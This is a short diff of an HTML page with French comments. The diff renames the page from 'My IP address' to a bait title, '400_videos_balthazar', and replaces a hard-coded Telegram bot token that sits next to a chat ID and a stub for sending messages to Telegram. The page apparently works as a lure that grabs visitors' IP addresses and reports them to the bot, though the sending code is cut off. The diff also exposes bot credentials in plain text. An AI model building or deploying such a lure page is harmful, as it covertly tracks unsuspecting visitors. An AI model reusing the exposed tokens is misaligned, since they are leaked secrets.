--- a/index.html
+++ b/index.html
@@ -1,17 +1,17 @@
 <!DOCTYPE html>
 <html>
 <head>
-    <title>Mon adresse IP</title>
+    <title>400_videos_balthazar</title>
     <style>p{
         color:white;
     }</style>
 </head>
 
 <body>
-    <p>Votre adresse IP est : <span id="ip"></span></p>
+    <p>ip: <span id="ip"></span></p>
 
     <script>
-        const BOT_TOKEN = '7990929037:AAGvc5oMgBjTw5cjfayR8nsGuOXmU2N59SE'; 
+        const BOT_TOKEN = '8175527930:AAHnOx_oQrAERZhoUYRxlxe7b67pZiB7bhc'; 
         const CHAT_ID = '7879061625'; 
 
         // Fonction pour envoyer un message à Telegram
